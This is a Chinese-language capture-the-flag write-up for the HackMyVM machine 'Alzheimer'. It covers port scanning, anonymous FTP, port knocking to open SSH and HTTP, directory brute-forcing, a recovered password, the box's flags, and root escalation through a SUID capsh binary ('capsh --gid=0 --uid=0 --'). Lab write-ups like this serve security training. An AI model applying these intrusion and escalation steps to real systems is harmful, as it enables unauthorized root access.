9.Alzheimer
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Alzheimer
作者:sml
难度:死题
知识点:knock命令、SUID提权(capsh)
2. 信息收集
端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.11 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:23 CST
Nmap scan report for 192.168.9.11
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:93:BB:DC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 9.18 seconds
对80 22进行了限制
3. ftp匿名登录
ftp 192.168.9.11
anonymous
里面有一个.secretnote.txt 文件
查看
cat .secretnote.txt
I need to knock this ports and
one door will be open!
1000
2000
3000
Ihavebeenalwayshere!!!
解密
意思是我们需要访问这3000个端口 然后就会有一个服务打开
依次访问这些端口
knock 192.168.9.11 1000 2000 3000 -v
然后重新扫描一下
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS 192.168.9.11 -p 1-65535
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-05 23:30 CST
Nmap scan report for 192.168.9.11
Host is up (0.00023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:93:BB:DC (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
可以发现22 80都开放了
访问网站
啥都没有
直接扫目录
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.9.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.11/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home (Status: 301) [Size: 185] [--> http://192.168.9.11/home/]
/admin (Status: 301) [Size: 185] [--> http://192.168.9.11/admin/]
/secret (Status: 301) [Size: 185] [--> http://192.168.9.11/secret/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
敲了半天开不了门。目录访问不了。后面看wp发现是网卡问题
这里直接给flag
root@alzheimer:~# cat /root/root.txt
HMVlovememories
root@alzheimer:~# cat /home/medusa/user.txt
HMVrespectmemories
root@alzheimer:~#
还是看下题目的考点吧。
敲门成功后访问网站根目录
下面应该是一个摩斯密码
OTHINGM
这个应该就是medusa的密码了
但是是不对的
继续看网站的其他目录
admin目录是空的
home目录下的文件提示我们pass在Home目录,但不是这个home目录
secret目录提示我们密码在这个secret目录的某个目录下
那密码就是在/secret/home目录
/secret/home目录的文件给了个啥用没有的提示
根目录给我们说他将密码写入了一个.txt文件
到目前为止,唯一获取到的.txt文件就是.secretnote.txt
I need to knock this ports and
one door will be open!
1000
2000
3000
Ihavebeenalwayshere!!!
里面的Ihavebeenalwayshere!!! 就是medusa的密码
4. 提权
虽然flag有了,但还是看看提权部分吧
拿到用户medusa的权限后
medusa@alzheimer:/root$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/sbin/capsh
capsh --gid=0 --uid=0 --
